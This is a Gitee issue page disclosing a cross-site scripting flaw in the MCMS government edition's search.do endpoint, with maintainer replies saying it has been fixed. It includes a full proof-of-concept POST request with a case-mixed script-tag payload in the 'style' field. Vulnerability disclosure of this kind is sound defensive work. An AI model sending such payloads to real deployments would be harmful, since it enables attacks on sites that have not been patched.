4.2K Star 24.8K Fork 7K

GVP铭飞/MCMS

 / 详情

政务版存在xss跨站脚本攻击

已完成
创建于  
2023-07-11 08:26

操作步骤:
http://ip:port/mcms/search.do
POST /mcms/search.do HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 59
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/x-www-form-urlencoded
Cookie: SHRIOSESSIONID-GOV=4b791a23-fd28-468c-8f24-9d303aebc88f
Origin: http://ip:port
Referer: http://ip:port/
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip

content_title=1&style=%3CScRiPt%3Ealert(123)%3C%2FScRiPt%3E
输入图片说明

评论 (3)

一剑还原 创建了任务

感谢对开源产品的关注,如果是政务用户可以直接在专属讨论组让沟通

铭飞 任务状态待办的 修改为进行中

1、这个漏洞我们生产环境已经临时解决了
2、政务版专属讨论组微信群服务到期后解散了

联系一下商务 :smile:

铭飞 任务状态进行中 修改为已完成

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(2)
542665 mingsoft 1714360870 519300 guohusong 1578926389
Java
1
https://gitee.com/mingSoft/MCMS.git
git@gitee.com:mingSoft/MCMS.git
mingSoft
MCMS
MCMS

搜索帮助

246c6175 1850385 950819b3 1850385